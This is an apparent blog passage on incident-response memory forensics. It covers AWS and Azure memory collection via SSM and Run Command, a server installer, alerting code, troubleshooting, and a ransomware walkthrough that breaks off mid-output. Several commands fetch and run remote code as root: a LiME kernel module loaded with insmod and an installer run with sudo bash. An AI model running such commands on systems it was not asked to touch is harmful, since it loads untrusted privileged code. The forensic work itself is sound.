# Wait for instance to stop (hibernation saves RAM to disk)
log.info(f"Waiting for {instance_id} to hibernate...")
waiter = ec2.get_waiter('instance_stopped')
waiter.wait(InstanceIds=[instance_id])
log.info("Instance hibernated - RAM saved to EBS")
# Get the root EBS volume
instance = ec2.describe_instances(InstanceIds=[instance_id])
root_device = instance['Reservations'][0]['Instances'][0]['RootDeviceName']
volumes = instance['Reservations'][0]['Instances'][0]['BlockDeviceMappings']
root_vol_id = None
for v in volumes:
if v['DeviceName'] == root_device:
root_vol_id = v['Ebs']['VolumeId']
break
if not root_vol_id:
log.error("Could not find root volume")
return None
# Create snapshot of the hibernated volume (contains RAM image)
snapshot = ec2.create_snapshot(
VolumeId=root_vol_id,
Description=f"IR memory collection {instance_id} {datetime.now().isoformat()}",
TagSpecifications=[{
'ResourceType': 'snapshot',
'Tags': [{'Key': 'IR-Purpose', 'Value': 'memory-collection'}]
}]
)
snapshot_id = snapshot['SnapshotId']
log.info(f"Snapshot created: {snapshot_id}")
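# Wait for snapshot to complete
# The default waiter gives up after roughly 10 minutes, which is too short
# for a large root volume, so allow up to 2 hours (240 polls x 30 s)
log.info("Waiting for snapshot completion...")
waiter = ec2.get_waiter('snapshot_completed')
waiter.wait(
SnapshotIds=[snapshot_id],
WaiterConfig={'Delay': 30, 'MaxAttempts': 240}
)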
# Restart the instance
ec2.start_instances(InstanceIds=[instance_id])
log.info(f"Instance {instance_id} restarted")
return snapshot_id
def collect_linux_ec2_ssm(
instance_id: str,
region: str = 'ap-southeast-2',
s3_bucket: str = 'ir-memory-collection',
build_server: str = 'http://192.168.1.100:8888/lime'
) -> Optional[str]:
"""
Collect Linux EC2 memory via SSM Run Command + LiME.
Uploads result directly to S3 to avoid cross-region transfer costs.
"""
ssm = boto3.client('ssm', region_name=region)
ec2 = boto3.client('ec2', region_name=region)
# Get instance details for kernel version
instance = ec2.describe_instances(InstanceIds=[instance_id])
instance_data = instance['Reservations'][0]['Instances'][0]
hostname = instance_data.get('PrivateDnsName', instance_id).split('.')[0]
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
s3_key = f"memory-images/{hostname}_{timestamp}.lime"
collection_script = f"""#!/bin/bash
set -euo pipefail
KERNEL=$(uname -r)
MODULE_URL="{build_server}/lime-$KERNEL.ko"
OUTPUT="/tmp/mem_ir_$KERNEL.lime"
# Download LiME module
curl -sf "$MODULE_URL" -o /tmp/lime_ir.ko || {{
echo "LiME module not available for kernel $KERNEL"
exit 1
}}
# Acquire memory
insmod /tmp/lime_ir.ko "path=$OUTPUT format=lime timeout=0"
rmmod lime 2>/dev/null || true
echo "Image size: $(du -sh $OUTPUT)"
echo "SHA256: $(sha256sum $OUTPUT)"
# Upload directly to S3 (avoids egress through IR network)
aws s3 cp "$OUTPUT" "s3://{s3_bucket}/{s3_key}" \
--sse aws:kms \
--no-progress
rm -f "$OUTPUT" /tmp/lime_ir.ko
echo "Upload complete: s3://{s3_bucket}/{s3_key}"
"""
response = ssm.send_command(
InstanceIds=[instance_id],
DocumentName='AWS-RunShellScript',
Parameters={'commands': [collection_script]},
Comment=f'IR memory collection {timestamp}',
TimeoutSeconds=3600,
)
command_id = response['Command']['CommandId']
log.info(f"SSM command sent: {command_id}")
# Poll for completion
while True:
time.sleep(30)
result = ssm.get_command_invocation(
CommandId=command_id,
InstanceId=instance_id
)
status = result['Status']
if status in ('Success', 'Failed', 'Cancelled', 'TimedOut'):
log.info(f"SSM command {status}: {result.get('StandardOutputContent','')[-500:]}")
break
log.info(f"Collection in progress: {status}")
return f"s3://{s3_bucket}/{s3_key}" if status == 'Success' else None
def download_from_s3_to_pipeline(
s3_uri: str,
local_dest: str,
region: str = 'ap-southeast-2'
) -> bool:
"""Download collected image from S3 to local analysis pipeline."""
import subprocess
bucket = s3_uri.replace('s3://', '').split('/')[0]
key = '/'.join(s3_uri.replace('s3://', '').split('/')[1:])
result = subprocess.run([
'aws', 's3', 'cp', s3_uri, local_dest,
'--region', region,
'--no-progress'
], capture_output=True, text=True)
return result.returncode == 0
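The SSM polling loop above runs until the command reaches a terminal state, which means a command that never reports one will block the collector indefinitely. A bounded version of the same loop can be sketched as follows. The helper name and its injectable `sleep` and `clock` parameters are assumptions made for testability, not part of boto3.

```python
import time
from typing import Callable, Optional

# Terminal states checked by the polling loop in collect_linux_ec2_ssm
TERMINAL = {"Success", "Failed", "Cancelled", "TimedOut"}


def wait_for_terminal_status(
    get_status: Callable[[], str],
    timeout_s: float = 3600,
    interval_s: float = 30,
    sleep: Callable[[float], None] = time.sleep,
    clock: Callable[[], float] = time.monotonic,
) -> Optional[str]:
    """Poll get_status until it returns a terminal state or the deadline passes."""
    deadline = clock() + timeout_s
    while clock() < deadline:
        status = get_status()
        if status in TERMINAL:
            return status
        sleep(interval_s)
    return None  # deadline reached; the caller decides how to handle it
```

In the collector, `get_status` would be a small lambda wrapping `ssm.get_command_invocation(CommandId=command_id, InstanceId=instance_id)['Status']`, and a `None` result would be treated the same as a failed collection.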
## Azure VM memory collection
## Uses Azure Run Command to execute collection scripts on VMs
#!/usr/bin/env python3
"""Azure VM memory collection via Run Command API."""
from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient
import time, logging
log = logging.getLogger(__name__)
def collect_azure_vm(
subscription_id: str,
resource_group: str,
vm_name: str,
storage_account: str,
container: str = 'memory-images',
build_server: str = 'http://192.168.1.100:8888/lime'
) -> bool:
"""Run memory collection on an Azure VM via Run Command."""
credential = DefaultAzureCredential()
compute = ComputeManagementClient(credential, subscription_id)
# Get VM details
vm = compute.virtual_machines.get(resource_group, vm_name, expand='instanceView')
os_type = vm.storage_profile.os_disk.os_type
timestamp = time.strftime('%Y%m%d_%H%M%S')
blob_name = f"{vm_name}_{timestamp}"
if os_type == 'Windows':
script = f"""
$timestamp = '{timestamp}'
$hostname = $env:COMPUTERNAME
$output = "C:\\Windows\\Temp\\mem_ir_$timestamp.raw"
winpmem_mini_x64.exe $output
$ctx = New-AzStorageContext -StorageAccountName '{storage_account}' `
-UseConnectedAccount
Set-AzStorageBlobContent -File $output `
-Container '{container}' `
-Blob "${{hostname}}_$timestamp.raw" `
-Context $ctx
Remove-Item $output -Force
"""
script_type = 'RunPowerShellScript'
else: # Linux
script = f"""#!/bin/bash
set -euo pipefail
KERNEL=$(uname -r)
OUTPUT="/tmp/mem_ir_{timestamp}.lime"
curl -sf "{build_server}/lime-$KERNEL.ko" -o /tmp/lime_ir.ko
insmod /tmp/lime_ir.ko "path=$OUTPUT format=lime timeout=0"
rmmod lime 2>/dev/null || true
az storage blob upload --account-name '{storage_account}' \\
--container-name '{container}' \\
--name '{vm_name}_{timestamp}.lime' \\
--file "$OUTPUT" --auth-mode login
rm -f "$OUTPUT" /tmp/lime_ir.ko
"""
script_type = 'RunShellScript'
# Execute via Run Command
poller = compute.virtual_machines.begin_run_command(
resource_group, vm_name,
{'command_id': script_type, 'script': [script]}
)
result = poller.result(timeout=3600)
output = result.value[0].message if result.value else ''
log.info(f"Azure collection complete for {vm_name}: {output[-200:]}")
return 'complete' in output.lower() or 'upload' in output.lower()
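Matching on the words "complete" or "upload" in the Run Command output is fragile, because an error message such as "upload failed" also matches. One alternative is to have the collection script print an explicit marker as its last line and parse only that. The sketch below assumes a hypothetical marker line, `IR_COLLECTION_OK sha256=<digest>`, which the scripts above do not currently emit.

```python
import re
from typing import Optional

# Hypothetical marker: the collection script would print this as its final
# line, e.g.  echo "IR_COLLECTION_OK sha256=$(sha256sum "$OUTPUT" | cut -d' ' -f1)"
MARKER_RE = re.compile(r"^IR_COLLECTION_OK sha256=([0-9a-f]{64})\s*$", re.MULTILINE)


def parse_collection_result(output: Optional[str]) -> Optional[str]:
    """Return the SHA256 reported by the script, or None if it never finished."""
    match = MARKER_RE.search(output or "")
    return match.group(1) if match else None
```

Returning the digest rather than a boolean also gives the pipeline a collection-side hash to compare against once the image lands.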
One-shot pipeline installer
Everything in this post requires coordinated setup across multiple components. The one-shot installer below handles the complete pipeline deployment on a fresh Ubuntu 22.04 analysis server. Run it once, answer two prompts, and the full stack is operational. It is designed to be idempotent: running it a second time updates components without breaking what is already working.
#!/bin/bash
## install_memory_pipeline.sh
## One-shot installer for the complete memory analysis pipeline
## Ubuntu 22.04 LTS - run as root
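## Usage: curl -fsSL https://raw.githubusercontent.com/yourrepo/memory-pipeline/main/install.sh -o install.sh && sudo bash install.sh
## (download first: piping the script into bash leaves no terminal on stdin for the prompts below)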
set -euo pipefail
PIPELINE_VERSION="1.0.0"
PIPELINE_DIR="/srv/memory"
VENV_DIR="/opt/vol3-env"
DB_PASSWORD=$(openssl rand -base64 24 | tr -d '/+=' | head -c 20)
ANALYST_PASSWORD=$(openssl rand -base64 24 | tr -d '/+=' | head -c 20)
RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'; NC='\033[0m'
log_ok() { echo -e "${GREEN}[+]${NC} $*"; }
log_info() { echo -e "${YELLOW}[*]${NC} $*"; }
log_err() { echo -e "${RED}[!]${NC} $*"; }
echo "=================================================="
echo " Memory Analysis Pipeline Installer v${PIPELINE_VERSION}"
echo " Analysis server setup for fleet IR"
echo "=================================================="
echo
# Preflight checks
[[ $EUID -ne 0 ]] && { log_err "Run as root"; exit 1; }
[[ $(lsb_release -rs) != "22.04" ]] && log_info "Tested on Ubuntu 22.04 - other versions may work"
# Gather config
read -p "Analysis server IP (for Velociraptor/dashboard access): " SERVER_IP
read -p "Velociraptor server IP (or same as above): " VR_SERVER_IP
SERVER_IP=${SERVER_IP:-$(hostname -I | awk '{print $1}')}
VR_SERVER_IP=${VR_SERVER_IP:-$SERVER_IP}
log_info "Installing system packages"
apt-get update -qq
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq \
python3 python3-pip python3-venv python3-dev \
git curl wget jq bc \
parallel yara foremost bulk-extractor sleuthkit \
docker.io docker-compose-plugin \
postgresql-14 postgresql-client-14 \
redis-server \
nginx \
smbclient \
p7zip-full unzip \
net-tools iotop iftop \
libssl-dev libffi-dev libpq-dev \
build-essential
log_ok "System packages installed"
# Create analyst user
if ! id analyst &>/dev/null; then
useradd -m -s /bin/bash analyst
usermod -aG docker analyst
log_ok "Analyst user created"
fi
# Directory structure
mkdir -p $PIPELINE_DIR/{landing,processing,complete,reports,yara_rules/rules,logs,tools,lime_modules}
mkdir -p $PIPELINE_DIR/yara_rules/clean_samples
mkdir -p /etc/memory-ir
chown -R analyst:analyst $PIPELINE_DIR
log_ok "Directory structure created"
# Python virtual environment
log_info "Setting up Python environment"
python3 -m venv $VENV_DIR
source $VENV_DIR/bin/activate
pip install --upgrade pip -q
pip install -q \
volatility3 \
yara-python \
pefile \
capstone \
python-magic \
requests \
psycopg2-binary \
redis \
'celery[redis]' \
flower \
jinja2 \
flask \
watchdog \
boto3 \
azure-identity \
azure-mgmt-compute
log_ok "Python environment ready: $(vol --version)"
# Volatility symbols
log_info "Downloading Volatility symbol tables (this takes a few minutes)"
mkdir -p /opt/vol3-symbols
if [ ! -f /opt/vol3-symbols/windows.zip ]; then
wget -q --show-progress \
https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip \
-O /opt/vol3-symbols/windows.zip
cd /opt/vol3-symbols
unzip -q windows.zip -d windows/
fi
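SITE_PKGS=$(python3 -c "import site; print(site.getsitepackages()[0])")
# Link the windows symbol directory itself; linking onto the existing
# symbols/ package directory would only create a nested link inside it
ln -sfn /opt/vol3-symbols/windows "$SITE_PKGS/volatility3/symbols/windows" 2>/dev/null || true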
log_ok "Volatility symbols installed"
# PostgreSQL
log_info "Configuring PostgreSQL"
systemctl start postgresql
systemctl enable postgresql
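# Role and database names are taken from the connection URL written below
sudo -u postgres psql -q << SQLEOF
CREATE USER analyst WITH PASSWORD '${DB_PASSWORD}';
ALTER USER analyst WITH PASSWORD '${DB_PASSWORD}';
CREATE DATABASE memory_analysis OWNER analyst;
SQLEOF
cat > /etc/memory-ir/db.env << DBEOF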
POSTGRES_URL=postgresql://analyst:${DB_PASSWORD}@localhost/memory_analysis
CELERY_BROKER_URL=redis://localhost:6379/0
DBEOF
chmod 640 /etc/memory-ir/db.env
chown analyst:analyst /etc/memory-ir/db.env
# Initialize schema
source /etc/memory-ir/db.env
PGPASSWORD=$DB_PASSWORD psql -U analyst -d memory_analysis -h localhost << SCHEMAEOF
-- [...]
SCHEMAEOF
# Download WinPmem
# [...] 2>/dev/null || \
# log_info "WinPmem download failed - download manually from $WINPMEM_URL"
# Systemd services
log_info "Installing systemd services"
# Image watcher service
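cat > /etc/systemd/system/memory-watcher.service << SVCEOF
[...]
SVCEOF
# Celery triage worker service
cat > /etc/systemd/system/memory-celery-triage.service << SVCEOF
[...]
SVCEOF
# Celery deep-analysis worker service
cat > /etc/systemd/system/memory-celery-deep.service << SVCEOF
[...]
SVCEOF
# Save credentials
cat > /root/memory-pipeline-credentials.txt << CREDEOF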
Memory Analysis Pipeline - Installation Credentials
====================================================
Generated: $(date)
Server IP: $SERVER_IP
PostgreSQL:
Host: localhost
Database: memory_analysis
User: analyst
Password: $DB_PASSWORD
URL: postgresql://analyst:${DB_PASSWORD}@localhost/memory_analysis
Dashboard:
URL: http://${SERVER_IP}:8080
Celery Monitor (Flower):
URL: http://${SERVER_IP}:5555
Pipeline directories:
Landing: $PIPELINE_DIR/landing
Reports: $PIPELINE_DIR/reports
Logs: $PIPELINE_DIR/logs
Yara rules: $PIPELINE_DIR/yara_rules/rules/
CREDEOF
chmod 600 /root/memory-pipeline-credentials.txt
echo
echo "=================================================="
log_ok "Installation complete!"
echo "=================================================="
echo
echo "Next steps:"
echo " 1. Copy pipeline scripts to $PIPELINE_DIR/pipeline/"
echo " 2. Add your Yara rules to $PIPELINE_DIR/yara_rules/rules/"
echo " 3. Start services: systemctl start memory-watcher memory-celery-triage memory-celery-deep"
echo " 4. Check credentials: cat /root/memory-pipeline-credentials.txt"
echo " 5. Drop a test image into $PIPELINE_DIR/landing/ and watch the logs"
echo
echo "Dashboard will be available at: http://${SERVER_IP}:8080"
Alert integration: Slack, email, and PagerDuty notifications
A pipeline that silently processes images and writes results to a database is only useful if analysts are notified when high-risk findings arrive. The alert integration hooks into the report generation stage of the Celery pipeline and fires notifications through whichever channel your team monitors during incidents.
## pipeline/alerts.py - Multi-channel alerting for critical findings
import os
import json
import logging
import smtplib
import requests
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from typing import Dict, Optional
log = logging.getLogger(__name__)
# Configuration - set via environment variables
SLACK_WEBHOOK_URL = os.environ.get('SLACK_WEBHOOK_URL', '')
PAGERDUTY_KEY = os.environ.get('PAGERDUTY_INTEGRATION_KEY', '')
ALERT_EMAIL_FROM = os.environ.get('ALERT_EMAIL_FROM', '')
ALERT_EMAIL_TO = os.environ.get('ALERT_EMAIL_TO', '')
SMTP_HOST = os.environ.get('SMTP_HOST', 'localhost')
SMTP_PORT = int(os.environ.get('SMTP_PORT', '587'))
DASHBOARD_URL = os.environ.get('DASHBOARD_URL', 'http://localhost:8080')
def send_slack_alert(report: Dict) -> bool:
"""Send a Slack notification for high/critical findings."""
if not SLACK_WEBHOOK_URL:
return False
hostname = report.get('hostname', 'unknown')
risk_label = report.get('risk_label', 'UNKNOWN')
risk_score = report.get('risk_score', 0)
image_id = report.get('image_id', 0)
has_malfind = report.get('has_malfind', False)
ioc_count = report.get('ioc_count', 0)
susp_procs = report.get('suspicious_procs', 0)
colour = {
'CRITICAL': '#FF0000',
'HIGH': '#FF8C00',
'MEDIUM': '#FFD700',
'LOW': '#00FF00',
}.get(risk_label, '#808080')
# Build IOC summary
ioc_summary = ''
if report.get('iocs'):
top_iocs = report['iocs'][:5]
ioc_summary = '\n'.join(
f" `{i['type']}`: {i['value'][:60]}" for i in top_iocs
)
if len(report['iocs']) > 5:
ioc_summary += f"\n ...and {len(report['iocs'])-5} more"
payload = {
'attachments': [{
'color': colour,
'title': f":rotating_light: Memory Analysis Alert: {hostname}",
'title_link': f"{DASHBOARD_URL}/host/{image_id}",
'fields': [
{'title': 'Risk Level', 'value': risk_label, 'short': True},
{'title': 'Risk Score', 'value': str(risk_score), 'short': True},
{'title': 'Malfind', 'value': 'YES :red_circle:' if has_malfind else 'No', 'short': True},
{'title': 'IOCs Found', 'value': str(ioc_count), 'short': True},
{'title': 'Suspicious Processes', 'value': str(susp_procs), 'short': True},
],
'text': f"*Top IOCs:*\n{ioc_summary}" if ioc_summary else '',
'footer': 'Memory Analysis Pipeline',
'ts': int(__import__('time').time()),
}]
}
try:
resp = requests.post(SLACK_WEBHOOK_URL, json=payload, timeout=10)
resp.raise_for_status()
log.info(f"Slack alert sent for {hostname}")
return True
except Exception as e:
log.error(f"Slack alert failed: {e}")
return False
def send_pagerduty_alert(report: Dict) -> bool:
"""Create a PagerDuty incident for critical findings."""
if not PAGERDUTY_KEY or report.get('risk_label') != 'CRITICAL':
return False
hostname = report.get('hostname', 'unknown')
payload = {
'routing_key': PAGERDUTY_KEY,
'event_action': 'trigger',
'dedup_key': f"memory-ir-{hostname}-{report.get('image_id')}",
'payload': {
'summary': f"CRITICAL memory finding on {hostname} - Score: {report.get('risk_score')}",
'severity': 'critical',
'source': 'memory-analysis-pipeline',
'component': hostname,
'group': 'incident-response',
'class': 'memory-forensics',
'custom_details': {
'image_id': report.get('image_id'),
'has_malfind': report.get('has_malfind'),
'ioc_count': report.get('ioc_count'),
'suspicious_procs': report.get('suspicious_procs'),
'dashboard_url': f"{DASHBOARD_URL}/host/{report.get('image_id')}",
'top_iocs': report.get('iocs', [])[:3],
}
},
'links': [{
'href': f"{DASHBOARD_URL}/host/{report.get('image_id')}",
'text': 'View in Dashboard'
}]
}
try:
resp = requests.post(
'https://events.pagerduty.com/v2/enqueue',
json=payload, timeout=10
)
resp.raise_for_status()
log.info(f"PagerDuty incident created for {hostname}")
return True
except Exception as e:
log.error(f"PagerDuty alert failed: {e}")
return False
def send_email_alert(report: Dict) -> bool:
"""Send an email alert for high and critical findings."""
if not all([ALERT_EMAIL_FROM, ALERT_EMAIL_TO, SMTP_HOST]):
return False
hostname = report.get('hostname', 'unknown')
risk_label = report.get('risk_label', 'UNKNOWN')
subject = f"[{risk_label}] Memory Analysis Alert: {hostname}"
body = f"""
Memory Analysis Pipeline Alert
================================
Host: {hostname}
Risk Level: {risk_label}
Risk Score: {report.get('risk_score', 0)}
Image ID: {report.get('image_id')}
Has Malfind: {'YES - INJECTION DETECTED' if report.get('has_malfind') else 'No'}
IOCs Found: {report.get('ioc_count', 0)}
Susp. Procs: {report.get('suspicious_procs', 0)}
Dashboard: {DASHBOARD_URL}/host/{report.get('image_id')}
Top IOCs:
"""
for ioc in report.get('iocs', [])[:10]:
body += f" [{ioc['type']}] {ioc['value']}\n"
if report.get('malfind_regions'):
body += "\nInjection Indicators:\n"
for m in report['malfind_regions'][:5]:
body += f" PID {m['pid']} ({m['process']}): {m['protection']} "
body += f"PE={'YES' if m.get('has_pe') else 'no'} Risk={m['risk']}\n"
body += "\n--\nMemory Analysis Pipeline - automated notification"
msg = MIMEMultipart()
msg['From'] = ALERT_EMAIL_FROM
msg['To'] = ALERT_EMAIL_TO
msg['Subject'] = subject
msg.attach(MIMEText(body, 'plain'))
try:
with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=15) as smtp:
smtp.starttls()
smtp.sendmail(ALERT_EMAIL_FROM, [ALERT_EMAIL_TO], msg.as_string())
log.info(f"Email alert sent for {hostname}")
return True
except Exception as e:
log.error(f"Email alert failed: {e}")
return False
def fire_alerts(report: Dict) -> None:
"""Fire all configured alerts for a completed analysis report."""
risk_label = report.get('risk_label', 'LOW')
if risk_label not in ('HIGH', 'CRITICAL'):
return
hostname = report.get('hostname', 'unknown')
log.info(f"Firing alerts for {hostname} (risk={risk_label})")
send_slack_alert(report)
send_email_alert(report)
if risk_label == 'CRITICAL':
send_pagerduty_alert(report)
## Add to /etc/memory-ir/alerts.env and load in all service unit files:
# SLACK_WEBHOOK_URL=https://hooks.slack.com/services/YOUR/WEBHOOK/URL
# PAGERDUTY_INTEGRATION_KEY=your_pd_integration_key
# ALERT_EMAIL_FROM=memory-pipeline@corp.local
# ALERT_EMAIL_TO=ir-team@corp.local
# SMTP_HOST=smtp.corp.local
# SMTP_PORT=587
# DASHBOARD_URL=http://192.168.1.100:8080
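The alert functions index some report fields directly (`ioc['type']`, `m['pid']`, and so on), so a malformed report raises KeyError inside the email path instead of producing an alert. A small pre-flight check run before `fire_alerts` avoids losing a notification that way. This is a sketch; the function name is illustrative, and the set of top-level keys treated as expected is an assumption, since the alert code itself falls back to defaults for them.

```python
from typing import Dict, List

# Keys the alert functions index directly (a missing one raises KeyError)
IOC_KEYS = ("type", "value")
MALFIND_KEYS = ("pid", "process", "protection", "risk")
# Assumption: these top-level fields should always be present, even though
# the alert code falls back to defaults when they are missing
EXPECTED_KEYS = ("hostname", "risk_label", "risk_score", "image_id")


def report_problems(report: Dict) -> List[str]:
    """Return a list of human-readable problems; empty means safe to alert."""
    problems = [f"missing {key}" for key in EXPECTED_KEYS if key not in report]
    for section, keys in (("iocs", IOC_KEYS), ("malfind_regions", MALFIND_KEYS)):
        for index, entry in enumerate(report.get(section) or []):
            for key in keys:
                if key not in entry:
                    problems.append(f"{section}[{index}] missing {key}")
    return problems
```

Logging the returned list and still sending a reduced alert is usually preferable to dropping the notification entirely.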
Troubleshooting: common failures and fixes
These are the failures that actually happen in production deployments, with the specific fix for each one.
Volatility fails with “No suitable address space mapping found” (Volatility 3 typically reports this as “Unable to validate the plugin requirements”). This means Volatility could not identify the OS version from the memory image. The most common cause is missing symbol tables. Check that the symbol tables are correctly linked:
## Symbol table troubleshooting
source /opt/vol3-env/bin/activate
# Verify symbols are accessible
python3 -c "
import volatility3.symbols
import os
sym_path = os.path.dirname(volatility3.symbols.__file__)
print('Symbol path:', sym_path)
windows_syms = os.path.join(sym_path, 'windows')
if os.path.isdir(windows_syms):
    nspkg = os.listdir(windows_syms)
    print(f'Windows symbol files: {len(nspkg)}')
    print('Sample:', nspkg[:3] if nspkg else 'NONE - symbols missing')
else:
    print('ERROR: No windows symbol directory found')
"
# If symbols missing, re-download and re-link
wget -q https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip \
-O /tmp/windows.zip
mkdir -p /opt/vol3-symbols
unzip -q /tmp/windows.zip -d /opt/vol3-symbols/windows/
SITE=$(python3 -c "import site; print(site.getsitepackages()[0])")
rm -f $SITE/volatility3/symbols/windows
ln -sf /opt/vol3-symbols/windows $SITE/volatility3/symbols/windows
echo "Symbols re-linked"
# Test with a real image
vol -f /srv/memory/landing/test.raw windows.info 2>&1 | head -20
Image watcher detects the file but pipeline does not start. The file was registered, but no Celery worker is picking up the resulting task. Check that the workers are actually running and connected to Redis:
## Pipeline connectivity troubleshooting
# Check Celery workers are running
systemctl status memory-celery-triage memory-celery-deep
# Check Redis is reachable
redis-cli ping # Should return PONG
# Check queue has tasks
redis-cli llen celery # Default queue
redis-cli llen triage # Triage queue
# Check what the workers are running now, have scheduled, or have prefetched
source /opt/vol3-env/bin/activate
celery -A pipeline inspect active
celery -A pipeline inspect scheduled
celery -A pipeline inspect reserved
# Manually trigger pipeline for an existing image
python3 -c "
import sys
sys.path.insert(0, '/srv/memory/pipeline')
from pipeline import validate_image
validate_image.delay(int(sys.argv[1]))
print('Task queued')
" 123 # Replace 123 with the image ID from the database
# Watch the triage worker log in real time
tail -f /srv/memory/logs/celery_triage.log
Memory image SHA256 does not match expected value. The image was corrupted during transfer. This happens most commonly when the network drops mid-transfer or when the image file was still being written when the watcher triggered. The validation stage catches this and marks the image as invalid, but the image needs to be re-collected:
## Handling corrupt or partial images
# Check which images failed validation
# (replace changeme with the generated password stored in /etc/memory-ir/db.env)
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT id, hostname, status, image_size_gb, sha256
FROM memory_images
WHERE status IN ('validation_failed', 'pending')
ORDER BY received_at DESC;"
# Check if image file looks complete
python3 -c "
import sys
from pathlib import Path
img = Path(sys.argv[1])
size_gb = img.stat().st_size / 1e9
# A 16GB RAM system should produce at least 10GB compressed
print(f'File: {img.name}')
print(f'Size: {size_gb:.2f} GB')
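# Read the last 1KB (or the whole file if smaller) as a rough sanity check
with open(img, 'rb') as f:
    f.seek(-min(1024, img.stat().st_size), 2)
    tail = f.read(1024)
# Heuristic only: a healthy image can legitimately end in zeroed pages
print(f'Unique byte values in last 1KB: {len(set(tail))} (very low can mean a truncated or zero-filled tail)')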
" /srv/memory/landing/suspicious_image.raw
# Re-queue a corrected image for processing
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
UPDATE memory_images SET status = 'received' WHERE id = 123;"
# Then manually trigger: validate_image.delay(123)
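The authoritative check for a corrupt transfer is to recompute the SHA256 on the analysis server and compare it with the hash recorded on the endpoint at collection time. A minimal sketch of that comparison follows; it reads the file in chunks so a 50GB image does not need to fit in memory. The function names are illustrative, not part of the pipeline code.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 8 * 1024 * 1024) -> str:
    """Hash a file in fixed-size chunks and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def image_matches(path: Path, expected_hex: str) -> bool:
    """Compare the on-disk hash with the hash recorded at collection time."""
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())
```

If `image_matches` returns False for a file whose size is still growing, the watcher most likely triggered before the transfer finished; wait for the size to stabilise and check again before requesting a re-collection.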
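Malfind returns no results on a known-compromised image. There are three common causes. First, if the injected process is a 32-bit (WOW64) process on a 64-bit system, its injection artefacts are easy to miss unless you examine that process explicitly. Second, malfind only flags private memory regions that are still writable and executable, so a payload that flips its region back to read-execute after writing, or that overwrites an already-mapped module, will not appear. Third, the pages may not be in the image at all: memory that was paged out at acquisition time cannot be read back, and software that protects its own processes (PPL, anti-cheat, some EDR implementations) can leave gaps or inconsistencies in what the acquisition driver captured.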
## Malfind troubleshooting
# Check the OS and process bitness
vol -f memory.raw windows.info
vol -f memory.raw windows.pslist | head -20
# Try running malfind against a specific PID explicitly
vol -f memory.raw windows.malfind --pid 1234
# If malfind misses things, try the raw VAD scanner
vol -f memory.raw windows.vadinfo --pid 1234 | grep EXECUTE
# Cross-check with alternative approach: look for RWX memory directly
# (vadwalk prints only the VAD tree layout; protection flags are in vadinfo)
vol -f memory.raw windows.vadinfo --pid 1234 | \
grep -E "PAGE_EXECUTE_(READWRITE|WRITECOPY)"
# For 32-bit processes on 64-bit systems, the WOW64 layer
# requires specific handling - check the process bitness:
vol -f memory.raw windows.dlllist --pid 1234 | grep -i "wow64" | head -5
Pipeline processes images but risk scores are all zero. The triage stage ran but found nothing suspicious. This is usually correct, but if you know the image is from a compromised host it means the anomaly detection rules need tuning for your environment. The most common cause is that the suspicious parent-child pairs in the triage code do not match the specific process names on that system:
## Risk scoring troubleshooting
# Check what the triage actually found
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT
mi.hostname,
tr.process_count,
tr.suspicious_process_count,
tr.network_conn_count,
tr.risk_score,
tr.triage_summary
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
WHERE mi.id = 123;"
# List all processes that were analysed
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT pid, ppid, name, path, is_suspicious, suspicious_reason
FROM process_list
WHERE image_id = 123
ORDER BY is_suspicious DESC, pid;"
# If you know a specific process is malicious but it was not flagged,
# check what parent name the triage code saw vs what was expected
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT pl.pid, pl.name, pl.path,
parent.name AS parent_name
FROM process_list pl
LEFT JOIN process_list parent ON parent.pid = pl.ppid AND parent.image_id = pl.image_id
WHERE pl.image_id = 123
ORDER BY pl.pid;"
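The parent-child check that the last query supports can be sketched in a few lines of Python, which is a convenient way to test a candidate pair before adding it to the triage rules. The pairs below are illustrative examples only and are not the list used by the triage code; process names are compared case-insensitively because the same binary often appears with different casing.

```python
from typing import Iterable, List, NamedTuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str


# Illustrative (parent, child) pairs; replace with the pairs your triage
# code actually uses
SUSPICIOUS_PAIRS = {
    ("winword.exe", "powershell.exe"),
    ("excel.exe", "cmd.exe"),
    ("w3wp.exe", "cmd.exe"),
}


def flag_suspicious(procs: Iterable[Proc]) -> List[Proc]:
    """Return child processes whose (parent, child) names match a known pair."""
    procs = list(procs)
    by_pid = {p.pid: p for p in procs}
    flagged = []
    for proc in procs:
        parent = by_pid.get(proc.ppid)
        if parent and (parent.name.lower(), proc.name.lower()) in SUSPICIOUS_PAIRS:
            flagged.append(proc)
    return flagged
```

If a process you know to be malicious is not flagged here either, compare the parent name returned by the query above with the pair you expected; a truncated or differently cased name is the usual culprit.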
End-to-end worked example: a simulated ransomware incident
This section walks through the complete pipeline from the moment a threat is detected through to a final analyst report, using a realistic scenario. It is Monday morning, 07:15 UTC. The SOC receives an alert that a domain controller (DC01, 64GB RAM) and three workstations (WS-FINANCE-01, WS-FINANCE-02, WS-FINANCE-03, 16GB RAM each) are showing unusual SMB activity, and files with encrypted extensions are appearing on a file server. The decision is made to collect memory from all four systems before any containment action that might destroy volatile evidence.
## Step 1: Run the network impact assessment before starting anything
python3 /srv/memory/network_impact.py << 'EOF'
endpoints = {
"dc01_64gb": {"count": 1, "ram_gb": 64, "compression_ratio": 0.60},
"finance_workstations": {"count": 3, "ram_gb": 16, "compression_ratio": 0.65},
}
link_speed_mbps = 1000
max_utilisation = 0.30
EOF
## Output:
## dc01_64gb:
## Compressed size: ~38.4 GB per image
## Transfer time: ~17.1 minutes per host at 30% link
## finance_workstations:
